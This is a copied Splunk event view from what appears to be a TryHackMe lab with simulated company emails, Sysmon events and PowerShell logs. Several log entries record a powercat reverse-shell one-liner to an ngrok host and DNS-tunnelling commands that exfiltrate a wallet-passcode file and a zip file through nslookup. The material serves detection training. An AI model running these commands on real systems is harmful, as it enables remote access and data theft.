

## New Search

```
1 index=main | top 5 src
```

Last 48 hours

✓ 313 events (1/9/26 3:00:00.000 PM to 1/11/26 3:40:35.000 PM) No Event Sampling

### Events (313)

Format Timeline

1 hour per column



SELECTED FIELDS	Time	Event
<i>a</i> host 1	1/11/26	{ [-]
<i>a</i> source 1	3:32:25.633 PM	attachment: forceupdate.ps1
<i>a</i> sourcetype 1		content: Michelle, here's the updated script. Th
		is version should work better - just run it when yo
		u get a chance.
		datasource: email
		direction: internal
		recipient: michelle.smith@tryhatme.com
		sender: yani.zubair@tryhatme.com
		subject: Force update fix
		timestamp: 01/11/2026 15:32:25.633
		}
		Show as raw text
		host = 10.10.67.0:8989   source = eventcollector
		sourcetype = _json
	1/11/26	{ [-]
	3:31:53.633 PM	datasource: sysmon
		event.action: Process Create (rule: ProcessCreat
		e)
		event.code: 1
		host.name: win-3456
		process.command_line: C:\Windows\system32\rundll1
		32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTrack
		sByProcess Flags:276824072 WinX:0 WinY:0 IEFrame:00
		0000000000000000
		process.name: rundll32.exe
		process.parent.name: iexplore.exe
		process.parent.pid: 3937
		process.pid: 3829
		process.working_directory: C:\Users\safa.prince
		\Desktop\
		timestamp: 01/11/2026 15:31:53.633
		}
		Show as raw text
		host = 10.10.67.0:8989   source = eventcollector
		sourcetype = _json

Time	Event
1/11/26 3:31:51.633 PM	<pre>{   [-]     datasource: sysmon     event.action: Registry object added or deleted     (rule: RegistryEvent)     event.code: 12     host.name: win-3450     process.name: spoolsv.exe     process.pid: 3824     registry.key: System\CurrentControlSet\Control\Classes\{1ed2bbf9-11f0-4084-b21f-ad83a8e6dc0c}\0003\DriverVersion     registry.path: HKLM\System\CurrentControlSet\Control\Class\{1ed2bbf9-11f0-4084-b21f-ad83a8e6dc0c}\003\DriverVersion     registry.value: DriverVersion     timestamp: 01/11/2026 15:31:51.633 }</pre> <p>Show as raw text</p> <p>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</p>
1/11/26 3:31:51.633 PM	<pre>{   [-]     datasource: sysmon     event.action: Registry value set (rule: RegistryEvent)     event.code: 13     host.name: win-3452     process.pid: 3764     registry.key: System\CurrentControlSet\Enum\SWD\PRINTENUM\{1E7F5481-8BCC-4426-B671-08BCD04848A0}\FriendlyName     registry.path: HKLM\System\CurrentControlSet\Enum\SWD\PRINTENUM\{1E7F5481-8BCC-4426-B671-08BCD04848A0}\FriendlyName     registry.value: FriendlyName     timestamp: 01/11/2026 15:31:51.633 }</pre> <p>Show as raw text</p> <p>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</p>
1/11/26 3:31:37.633 PM	<pre>{   [-]     attachment: None     content: Will there be a recording available for those unable to attend live     datasource: email     direction: inbound     recipient: cain.omoore@tryhatme.com     sender: osman@stylewatchjournal.com     subject: RE: RE: Seminar Registration: Hat Industry Innovation Trends     timestamp: 01/11/2026 15:31:37.633 }</pre> <p>Show as raw text</p> <p>host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json</p>

Time	Event
1/11/26 3:31:34.633 PM	{ [-] <b>datasource</b> : sysmon <b>event.action</b> : Process Create (rule: ProcessCreate) <b>event.code</b> : 1 <b>host.name</b> : win-3449 <b>process.command_line</b> : "C:\Program Files\Internet Explorer\iexplore.exe" -startmanager -Embedding <b>process.name</b> : iexplore.exe <b>process.parent.pid</b> : 3987 <b>process.pid</b> : 3903 <b>process.working_directory</b> : C:\Windows\system32 <b>timestamp</b> : 01/11/2026 15:31:34.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json
1/11/26 3:31:11.633 PM	{ [-] <b>datasource</b> : sysmon <b>dns.answers.data</b> : 172.16.1.15 <b>dns.question.name</b> : mailsrv-01.tryhatme.com <b>dns.resolved_ip</b> : 172.16.1.15 <b>event.action</b> : Dns query (rule: DnsQuery) <b>event.code</b> : 22 <b>host.name</b> : win-3452 <b>network.protocol</b> : dns <b>process.name</b> : OUTLOOK.EXE <b>process.pid</b> : 3968 <b>timestamp</b> : 01/11/2026 15:31:11.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json
1/11/26 3:31:03.633 PM	{ [-] <b>attachment</b> : None <b>content</b> : This is getting ridiculous--why is this still unresolved? <b>datasource</b> : email <b>direction</b> : internal <b>recipient</b> : sophie.j@tryhatme.com <b>sender</b> : sophie.j@tryhatme.com <b>subject</b> : RE: RE: Concerns over IHateHats.tech <b>timestamp</b> : 01/11/2026 15:31:03.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:30:56.633 PM	{ [-] attachment: None content: Travel through time and experience the evolution of hats from ancient Egypt to futuristic Mars Only 500 per ticket datasource: email direction: inbound recipient: contact@tryhatme.com sender: josephine@gmail.com subject: Time Traveling Hat Adventure Explore Ancient Lands for Cheap timestamp: 01/11/2026 15:30:56.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json
1/11/26 3:30:43.633 PM	{ [-] attachment: None content: Please review and confirm availability for the proposed meeting time datasource: email direction: inbound recipient: contact@tryhatme.com sender: day@stylishhatboutique.com subject: FWD: Scheduling a Virtual Meeting to Discuss Market Trends timestamp: 01/11/2026 15:30:43.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json
1/11/26 3:30:43.633 PM	{ [-] attachment: None content: Thank you for the opportunity I confirm my availability and look forward to speaking with your team datasource: email direction: outbound recipient: duke@trendsettingtrilbies.com sender: invoice@tryhatme.com subject: RE: Job Interview Invitation: Exciting Career Opportunity timestamp: 01/11/2026 15:30:43.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:30:33.633 PM	{ [-] attachment: None content: The upcoming seminar will cover the latest innovations in hat manufacturing and design. Secure your spot today. datasource: email direction: outbound recipient: barker@hatcouturecompany.net sender: sophie.j@tryhatme.com subject: Seminar Registration: Hat Industry Innovation Trends timestamp: 01/11/2026 15:30:33.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json
1/11/26 3:30:29.633 PM	{ [-] attachment: None content: Here is a summary of our last discussion along with action items for the next steps. Let us know if you have any modifications. datasource: email direction: outbound recipient: duke@stylewatchjournal.com sender: roger.fedora@tryhatme.com subject: Follow-up on Previous Discussion: Next Steps for Engagement timestamp: 01/11/2026 15:30:29.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json
1/11/26 3:30:21.633 PM	{ [-] attachment: None content: Your feedback matters—take a few minutes to fill this out. datasource: email direction: internal recipient: michelle.smith@tryhatme.com sender: michelle.smith@tryhatme.com subject: Hat-titude Check: Employee Feedback Survey timestamp: 01/11/2026 15:30:21.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:30:04.633 PM	{ [-] <b>datasource</b> : sysmon <b>event.action</b> : Registry value set (rule: Registry Event) <b>event.code</b> : 13 <b>host.name</b> : win-3456 <b>process.pid</b> : 3878 <b>registry.key</b> : System\CurrentControlSet\Enum\SWD\PRINTENUM\{49455221-FA52-47F9-826D-B41CFD35E447}\FriendlyName <b>registry.path</b> : HKLM\System\CurrentControlSet\Enum\SWD\PRINTENUM\{49455221-FA52-47F9-826D-B41CFD35E447}\FriendlyName <b>registry.value</b> : FriendlyName <b>timestamp</b> : 01/11/2026 15:30:04.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json
1/11/26 3:29:52.633 PM	{ [-] <b>datasource</b> : sysmon <b>event.action</b> : Registry value set (rule: Registry Event) <b>event.code</b> : 13 <b>host.name</b> : win-3458 <b>process.name</b> : spoolsv.exe <b>process.pid</b> : 3613 <b>registry.key</b> : System\CurrentControlSet\Control\DeviceClasses\{0ecef634-6ef0-472a-8085-5ad023ecbccd}\#\#?#SWD#PRINTENUM#\{1E7F5481-8BCC-4426-B671-08BCD04848A0#\{0ecef634-6ef0-472a-8085-5ad023ecbccd}\#\Device Parameters\FriendlyName <b>registry.path</b> : HKLM\System\CurrentControlSet\Control\DeviceClasses\{0ecef634-6ef0-472a-8085-5ad023ecbccd}\#\#?#SWD#PRINTENUM#\{1E7F5481-8BCC-4426-B671-08BCD04848A0#\{0ecef634-6ef0-472a-8085-5ad023ecbccd}\#\Device Parameters\FriendlyName <b>registry.value</b> : FriendlyName <b>timestamp</b> : 01/11/2026 15:29:52.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:29:50.633 PM	{ [-] datasource: sysmon dns.answers.data: 172.16.1.10 dns.question.name: DC-01.tryhatme.com dns.resolved_ip: 172.16.1.10 event.action: Dns query (rule: DnsQuery) event.code: 22 host.name: win-3453 network.protocol: dns process.name: OUTLOOK.EXE process.pid: 3821 timestamp: 01/11/2026 15:29:50.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector sourcetype = _json
1/11/26 3:29:12.633 PM	{ [-] datasource: sysmon dns.answers.data: 172.16.1.10 dns.question.name: DC-01.tryhatme.com dns.resolved_ip: 172.16.1.10 event.action: Dns query (rule: DnsQuery) event.code: 22 host.name: win-3453 network.protocol: dns process.name: OUTLOOK.EXE process.pid: 3851 timestamp: 01/11/2026 15:29:12.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector sourcetype = _json
1/11/26 3:28:58.633 PM	{ [-] datasource: sysmon event.action: Registry object added or deleted (rule: RegistryEvent) event.code: 12 host.name: win-3453 process.name: spoolsv.exe process.pid: 3888 registry.key: System\CurrentControlSet\Enum\SWD \PRINTENUM\{2D00BA8B-3E7F-4C85-88E7-D1E9D13350F0}\F riendlyName registry.path: HKLM\System\CurrentControlSet\Enu m\SWD\PRINTENUM\{2D00BA8B-3E7F-4C85-88E7-D1E9D13350 F0}\FriendlyName registry.value: FriendlyName timestamp: 01/11/2026 15:28:58.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector sourcetype = _json

Time	Event
1/11/26 3:28:54.633 PM	{ [-] attachment: None content: Interviews set for next week. Check your calendars for slots. datasource: email direction: internal recipient: safा.принс@tryhatme.com sender: safा.принс@tryhatme.com subject: Hiring Update - Interview Schedule timestamp: 01/11/2026 15:28:54.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json
1/11/26 3:28:48.633 PM	{ [-] datasource: sysmon event.action: Registry value set (rule: Registry Event) event.code: 13 host.name: win-3451 process.name: spoolsv.exe process.pid: 3623 registry.key: System\CurrentControlSet\Control\DeviceClasses\{0ecef634-6ef0-472a-8085-5ad023ecbccd}\#\#?#SWD#PRINTENUM#\{49455221-FA52-47F9-826D-B41CFD35E447#\{0ecef634-6ef0-472a-8085-5ad023ecbccd}\#\Device Parameters\FriendlyName registry.path: HKLM\System\CurrentControlSet\Control\DeviceClasses\{0ecef634-6ef0-472a-8085-5ad023ecbccd}\#\#?#SWD#PRINTENUM#\{49455221-FA52-47F9-826D-B41CFD35E447#\{0ecef634-6ef0-472a-8085-5ad023ecbccd}\#\Device Parameters\FriendlyName registry.value: FriendlyName timestamp: 01/11/2026 15:28:48.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json
1/11/26 3:28:44.633 PM	{ [-] datasource: sysmon dns.answers.data: 172.16.1.10 dns.question.name: DC-01.tryhatme.com dns.resolved_ip: 172.16.1.10 event.action: Dns query (rule: DnsQuery) event.code: 22 host.name: win-3457 network.protocol: dns process.name: OUTLOOK.EXE process.pid: 3814 timestamp: 01/11/2026 15:28:44.633 } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:31.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: . Context Information: DetailSequence=1 DetailTotal=1 SequenceNumber=5745 UserId=SSF \michael.ascot HostName=ConsoleHost HostVersion =5.1.20348.1366 HostId=bbaf2919-3765-42de-b254-1953 f32951cb HostApplication=C:\Windows\System32 \WindowsPowerShell\v1.0\powershell.exe -c IEX(New-Object System.Net.WebClient).DownloadString('http s://raw.githubusercontent.com/besimorhino/powercat/ master/powercat.ps1'); powercat -c 2.tcp.ngrok.io - p 19282 -e powershell EngineVersion=5.1.20348.136 6 RunspaceId=b980ae09-17ad-4495-b218-4b1e5219 0205 PipelineId=1 ScriptName= CommandLine = Details: CommandInvocation(Out-Default): "Out-Def ault" powershell.command.invocation_details.value: "Ou t-Default" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -c IEX(New-Object S ystem.Net.WebClient).DownloadString('https://raw.gi thubusercontent.com/besimorhino/powercat/master/pow ercat.ps1'); powercat -c 2.tcp.ngrok.io -p 19282 -e powershell <b>timestamp:</b> 01/11/2026 15:28:31.633 <b>winlog.process.pid:</b> - } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:31.633 PM	{ [-] <b>datasource</b> : powershell <b>event.action</b> : Pipeline Execution Details <b>file.path</b> : - <b>host.name</b> : win-3450 <b>message</b> : Pipeline execution details for command line:       \$FuncVars["Process"]   Stop-Process. Cont ext Information:       DetailSequence=1       Det ailTotal=1       SequenceNumber=5741       UserId=SSF \michael.ascot   HostName=ConsoleHost    HostVersion =5.1.20348.1366 HostId=bbaf2919-3765-42de-b254-1953 f32951cb        HostApplication=C:\Windows\System32 \WindowsPowerShell\v1.0\powershell.exe -c IEX(New-Object System.Net.WebClient).DownloadString('https://raw.gith ubusercontent.com/besimorhino/powercat/ master/powercat.ps1'); powercat -c 2.tcp.ngrok.io - p 19282 -e powershell   EngineVersion=5.1.20348.136 6       RunspaceId=b980ae09-17ad-4495-b218-4b1e5219 0205      PipelineId=1    ScriptName=     CommandLine =       \$FuncVars["Process"]   Stop-Process Details: C ommandInvocation(Stop-Process): "Stop-Process"Param eterBinding(Stop-Process): name="InputObject"; valu e="System.Diagnostics.Process (powershell)" <b>powershell.command.invocation_details.value</b> : "St op-Process", "System.Diagnostics.Process (powershel l)" <b>powershell.command.name</b> : - <b>powershell.file.script_block_text</b> : - <b>process.command_line</b> : C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -c IEX(New-Object S ystem.Net.WebClient).DownloadString('https://raw.gi thubusercontent.com/besimorhino/powercat/master/pow ercat.ps1'); powercat -c 2.tcp.ngrok.io -p 19282 -e powershell <b>timestamp</b> : 01/11/2026 15:28:31.633 <b>winlog.process.pid</b> : - } Show as raw text host = 10.10.67.0:8989     source = eventcollector     sourcetype = _json

Time	Event
1/11/26 3:28:22.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToString([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.asco t\Downloads\BitcoinWalletPasscodes.txt")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information: DetailSeque nce=1 DetailTotal=1 SequenceNumber=485 Use rId=SSF\michael.ascot HostName=ConsoleHost Hos tVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041 HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass EngineVersion=5.1.20348.136 6 RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280 PipelineId=59 ScriptName= CommandLine =\$base64 = [System.Convert]::ToString([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\BitcoinWalletPasscodes.txt")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup RmYjEyNGZi MTY1NjZlfQ==.haz4rdw4re.io" powershell.command.invocation_details.value: "In voke-Expression", "nslookup RmYjEyNGZiMTY1NjZlfQ==. haz4rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass timestamp: 01/11/2026 15:28:22.633 winlog.process.pid: - } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:22.633 PM	{ [-] <b>datasource</b> : sysmon <b>event.action</b> : Process Create (rule: ProcessCreate) <b>event.code</b> : 1 <b>host.name</b> : win-3450 <b>process.command_line</b> : "C:\Windows\system32\nslookup.exe" RmYjEyNGZiMTY1NjZ1fQ==.haz4rdw4re.io <b>process.name</b> : nslookup.exe <b>process.parent.name</b> : powershell.exe <b>process.parent.pid</b> : 3728 <b>process.pid</b> : 3648 <b>process.working_directory</b> : C:\Users\michael.ascott\downloads\ <b>timestamp</b> : 01/11/2026 15:28:22.633 }
	Show as raw text
	host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json
1/11/26 3:28:22.633 PM	{ [-] <b>datasource</b> : sysmon <b>event.action</b> : Process Create (rule: ProcessCreate) <b>event.code</b> : 1 <b>host.name</b> : win-3450 <b>process.command_line</b> : "C:\Windows\system32\nslookup.exe" VEhNezE0OTczMjFmNGY2ZjA1WE1Mm.haz4rdw4re.io <b>process.name</b> : nslookup.exe <b>process.parent.name</b> : powershell.exe <b>process.parent.pid</b> : 3728 <b>process.pid</b> : 3700 <b>process.working_directory</b> : C:\Users\michael.ascott\downloads\ <b>timestamp</b> : 01/11/2026 15:28:22.633 }
	Show as raw text
	host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:22.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToString([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.asco t\Downloads\BitcoinWalletPasscodes.txt")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information: DetailSeque nce=1 DetailTotal=1 SequenceNumber=483 Use rId=SSF\michael.ascot HostName=ConsoleHost Hos tVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041 HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass EngineVersion=5.1.20348.136 6 RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280 PipelineId=59 ScriptName= CommandLine =\$base64 = [System.Convert]::ToString([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\BitcoinWalletPasscodes.txt")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup VEhNezE00T czMjFmNGY2ZjA10WE1Mm.haz4rdw4re.io" powershell.command.invocation_details.value: "In voke-Expression", "nslookup VEhNezE00TczMjFmNGY2ZjA 10WE1Mm.haz4rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass timestamp: 01/11/2026 15:28:22.633 winlog.process.pid: - } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:22.633 PM	<pre>{   [-]     datasource: powershell     event.action: Pipeline Execution Details     file.path: -     host.name: win-3450     message: Pipeline execution details for command     line: \$base64 = [System.Convert]::ToBase64String([S     ystem.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\BitcoinWalletPasscodes.txt")); \$base64     -split '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEach-Object {Invoke-Expression "nslookup \$_.haz4rdw4re.io"}. Context Information: DetailSequence=1 DetailTotal=1 SequenceNumber=487 Use     rId=SSF\michael.ascot HostName=ConsoleHost Host     Version=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-9     8b9-9193fdb89041 HostApplication=C:\Windows     \System32\WindowsPowerShell\v1.0\powershell.exe -Ex     ecutionPolicy Bypass EngineVersion=5.1.20348.136     6 RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd     8280 PipelineId=59 ScriptName= CommandLine     =\$base64 = [System.Convert]::ToBase64String([Syste     m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do     wnloads\BitcoinWalletPasscodes.txt")); \$base64 -spl     it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa     ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4re     .io"} Details: CommandInvocation(Where-Object): "W     here-Object"ParameterBinding(Where-Object): name="F     ilterScript"; value=" \$_ -ne '' "CommandInvocation     (ForEach-Object): "ForEach-Object"ParameterBinding     (ForEach-Object): name="Process"; value="Invoke-Exp     ression "nslookup \$_.haz4rdw4re.io""ParameterBindin     g(Where-Object): name="InputObject"; value=""Param     eterBinding(Where-Object): name="InputObject"; value     ="VEhNezE00TczMjFmNGY2ZjA10WE1Mm"ParameterBinding(F     orEach-Object): name="InputObject"; value="VEhNezE0     0TczMjFmNGY2ZjA10WE1Mm"ParameterBinding(Where-Objec     t): name="InputObject"; value=""ParameterBinding(W     here-Object): name="InputObject"; value="RmYjEyNGZiM     TY1NjZlfQ=="ParameterBinding(ForEach-Object): name     ="InputObject"; value="RmYjEyNGZiMTY1NjZlfQ=="Param     eterBinding(Where-Object): name="InputObject"; valu     e=""     powershell.command.invocation_details.value: "Wh     ere-Object", " \$_ -ne '' ", "ForEach-Object", "Invo     ke-Expression "nslookup \$_.haz4rdw4re.io", "", "VE     hNezE00TczMjFmNGY2ZjA10WE1Mm", "VEhNezE00TczMjFmNGY     2ZjA10WE1Mm", "", "RmYjEyNGZiMTY1NjZlfQ==", "RmYjEy     NGZiMTY1NjZlfQ==", ""     powershell.command.name: -     powershell.file.script_block_text: -     process.command_line: C:\Windows\System32\Window     sPowerShell\v1.0\powershell.exe -ExecutionPolicy By     pass     timestamp: 01/11/2026 15:28:22.633     winlog.process.pid: - } }</pre>

## Time

## Event

Show as raw text

```
host = 10.10.67.0:8989 | source = eventcollector  
sourcetype = _json
```

1/11/26  
3:28:14.633 PM

```
{ [-]  
  attachment: None  
  content: I have checked my schedule and I will  
  be attending Looking forward to meeting everyone an  
  d exchanging ideas  
  datasource: email  
  direction: outbound  
  recipient: conor@yahoo.com  
  sender: michael.ascot@tryhatme.com  
  subject: RE: Invitation to a Business Networking  
  Luncheon Next Week  
  timestamp: 01/11/2026 15:28:14.633  
}  
Show as raw text
```

```
host = 10.10.67.0:8989 | source = eventcollector  
sourcetype = _json
```

Time	Event
1/11/26 3:28:07.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToString([System.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEach-Object {Invoke-Expression "nslookup \$_.haz4rdw4re.io"}. Context Information: DetailSequence=1 DetailTotal=1 SequenceNumber=461 Use rId=SSF\michael.ascot HostName=ConsoleHost Hos tVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041 HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass EngineVersion=5.1.20348.136 6 RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280 PipelineId=53 ScriptName= CommandLine =\$base64 = [System.Convert]::ToString([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expres sion): "Invoke-Expression"ParameterBinding(Invoke-Exp ression): name="Command"; value="nslookup AAAABbAAAA SW52ZXN0b3JQcmVzZW50.haz4rdw4re.io" powershell.command.invocation_details.value: "In voke-Expression", "nslookup AAAABbAAAASW52ZXN0b3JQc mVzZW50.haz4rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass timestamp: 01/11/2026 15:28:07.633 winlog.process.pid: - }

Show as raw text

host = 10.10.67.0:8989 | source = eventcollector |  
sourcetype = \_json |

Time	Event
1/11/26 3:28:07.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.asco t\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:                   DetailSeque nce=1   DetailTotal=1   SequenceNumber=455        Use rId=SSF\michael.ascot   HostName=ConsoleHost    Hos tVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041                                  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass    EngineVersion=5.1.20348.136 6                      RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280                   PipelineId=53    ScriptName=      CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup AABDbG11bn RQb3J0Zm9saW9TdW1tYX.haz4rdw4re.io" powershell.command.invocation_details.value: "In voke-Expression", "nslookup AABDbG11bnRQb3J0Zm9saW9 TdW1tYX.haz4rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass timestamp: 01/11/2026 15:28:07.633 winlog.process.pid: - } Show as raw text host = 10.10.67.0:8989   source = eventcollector   sourcetype = _json

Time	Event
1/11/26 3:28:07.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.asc ot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:                   DetailSeque nce=1   DetailTotal=1   SequenceNumber=453        Use rId=SSF\michael.ascot   HostName=ConsoleHost    Hos tVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041            HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass    EngineVersion=5.1.20348.136 6           RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280      PipelineId=53    ScriptName=        CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expressio n): "Invoke-Expression"ParameterBinding(Invoke-Expr ession): name="Command"; value="nslookup AAAI8AAAAb AAAAAAAAAAAAAA.haz4rdw4re.io" powershell.command.invocation_details.value: "In voke-Expression", "nslookup AAAI8AAAAbAAAAAAAAAAA AAAAAA.haz4rdw4re.io" powershell.command.name: - powershell.file.script_block_text: - process.command_line: C:\Windows\System32\Window sPowerShell\v1.0\powershell.exe -ExecutionPolicy By pass timestamp: 01/11/2026 15:28:07.633 winlog.process.pid: - } Show as raw text host = 10.10.67.0:8989   source = eventcollector sourcetype = _json

Time	Event
1/11/26 3:28:07.633 PM	{ [-] datasource: powershell event.action: Pipeline Execution Details file.path: - host.name: win-3450 message: Pipeline execution details for command line: \$base64 = [System.Convert]::ToBase64String([S ystem.IO.File]::ReadAllBytes("C:\Users\michael.asc ot\Downloads\exfiltration\exfilt8me.zip")); \$base64 -split '(.{1,30})'   Where-Object { \$_ -ne '' }   F orEach-Object {Invoke-Expression "nslookup \$_.haz4r dw4re.io"}. Context Information:                   DetailSeque nce=1   DetailTotal=1   SequenceNumber=465        Use rId=SSF\michael.ascot   HostName=ConsoleHost    Hos tVersion=5.1.20348.1366 HostId=cc1a6844-a4f9-4e73-9 8b9-9193fdb89041                                  HostApplication=C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe -Ex ecutionPolicy Bypass    EngineVersion=5.1.20348.136 6                      RunspaceId=3c649a28-fde1-4e53-936b-e9e725bd 8280                   PipelineId=53    ScriptName=      CommandLine =\$base64 = [System.Convert]::ToBase64String([Syste m.IO.File]::ReadAllBytes("C:\Users\michael.ascot\Do wnloads\exfiltration\exfilt8me.zip")); \$base64 -spl it '(.{1,30})'   Where-Object { \$_ -ne '' }   ForEa ch-Object {Invoke-Expression "nslookup \$_.haz4rdw4r e.io"} Details: CommandInvocation(Invoke-Expres sion): 